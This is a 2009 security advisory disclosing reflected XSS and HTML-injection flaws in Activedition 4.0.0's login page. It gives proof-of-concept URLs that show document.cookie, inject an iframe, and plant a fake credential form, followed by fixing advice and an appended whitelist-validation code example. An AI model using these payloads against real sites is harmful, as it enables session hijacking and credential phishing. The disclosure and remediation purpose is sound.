Multiple XSS/HTML injection vulnerabilities on Activedition 4.0.0
30 April 2009
01 May 2009
Richard Brain and Rolando Fuentes of ProCheckUp Ltd (www.procheckup.com)
Several vulnerabilities have been found in Activedition version 4.0.0. They arise from insufficient input filtering.
By using a specially-crafted link, and tricking the victim into clicking on it, an attacker can perform malicious attacks such as the following:
- Hijack user accounts by stealing the victim's cookies that are assigned to the victim's browser by the vulnerable website
- Hijack user accounts by injecting a "fake" HTML form into the HTML rendered by the victim's web browser
- Redirect the victim to a malicious third-party website which would perform a phishing attack to steal the user's credentials, or exploit a vulnerability (e.g. a buffer overflow) in the victim's web browser in order to compromise the victim's workstation
Vulnerable Hidden Parameters:
Parameters showing a type mismatch machine error:
Proof of concept:
http://target-domain.foo/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="x" onerror='alert(document.cookie)'&liststatus=&area=&pageid=
http://target-domain.foo/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><iframe%20src="http://www.procheckup.com" width="600%" height="300%"&liststatus=&area=&pageid=
http://target-domain.foo/activedition/aelogin.asp?status=&noreset=False&workflow=&liststatus=&area=&pageid='"<script><b>User Name<b><BR><input name="user"><BR><b>Password<b><BR><input type = "password" name="pass"><button onClick="">Log in</button
Note: the previous examples were tested on IE7 and FF2.
How to fix:
Ensure all input is filtered sufficiently before being echoed back to the client. In particular, characters such as left and right angle brackets, quotation marks, apostrophes, semicolons and ampersands should be filtered. It is highly recommended to follow a white-listing input validation approach whenever possible.
Not only should the types of characters submitted be validated, but also the length of the submitted parameter value.
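As an added illustration (not Activedition's own code), the following server-side JScript/JavaScript shows the white-listing approach described above applied to the aelogin.asp parameters named in this bulletin: each value is checked against an allowed pattern and length, unknown parameters are dropped, and anything echoed back is HTML-entity encoded. The allowed value sets, patterns and length limits are assumptions made for the example.

```javascript
// Added example (not Activedition's code): whitelist validation plus HTML
// entity encoding for the aelogin.asp parameters named in the advisory.
// The accepted value sets and length limits below are assumptions made for
// illustration; a real fix would take them from the application's own logic.

const PARAM_RULES = {
  status:     { pattern: /^(Fail|Success)?$/,       maxLen: 10 },
  noreset:    { pattern: /^(True|False)?$/,         maxLen: 5 },
  workflow:   { pattern: /^[A-Za-z0-9_-]{0,32}$/,   maxLen: 32 },
  liststatus: { pattern: /^[A-Za-z0-9_-]{0,32}$/,   maxLen: 32 },
  area:       { pattern: /^[A-Za-z0-9_-]{0,32}$/,   maxLen: 32 },
  pageid:     { pattern: /^[0-9]{0,10}$/,           maxLen: 10 },
};

// Reject a parameter unless it is known and its value matches the whitelist
// (both character set and length are checked, as the bulletin recommends).
function validateParam(name, value) {
  const rule = PARAM_RULES[name];
  if (!rule) return false;                       // unknown parameter: drop it
  if (typeof value !== "string") return false;   // arrays/objects: type mismatch
  if (value.length > rule.maxLen) return false;  // enforce length before pattern
  return rule.pattern.test(value);
}

// Encode the five characters that let a value break out of HTML text or an
// attribute; this is the second line of defence when a value must be echoed.
function htmlEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Build the echoed fragment: invalid parameters are replaced by a neutral
// marker rather than reflected, and valid ones are still entity-encoded.
function renderLoginNotice(query) {
  const parts = [];
  for (const name of Object.keys(PARAM_RULES)) {
    const raw = Object.prototype.hasOwnProperty.call(query, name) ? query[name] : "";
    const safe = validateParam(name, raw) ? htmlEncode(raw) : "[invalid]";
    parts.push(`<input type="hidden" name="${name}" value="${safe}">`);
  }
  return parts.join("\n");
}

// Constructed inputs: the first mirrors the bulletin's workflow payload.
const ATTACK_QUERY = { status: "Fail", noreset: "True",
  workflow: `'"<script><img src="x" onerror='alert(document.cookie)'`, pageid: "" };
const BENIGN_QUERY = { status: "Fail", noreset: "True", workflow: "approve", pageid: "42" };
```

With the validation in place the reflected fragment for the attack query never contains the injected markup, while the benign query is echoed unchanged.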
Copyright 2009 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.
Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.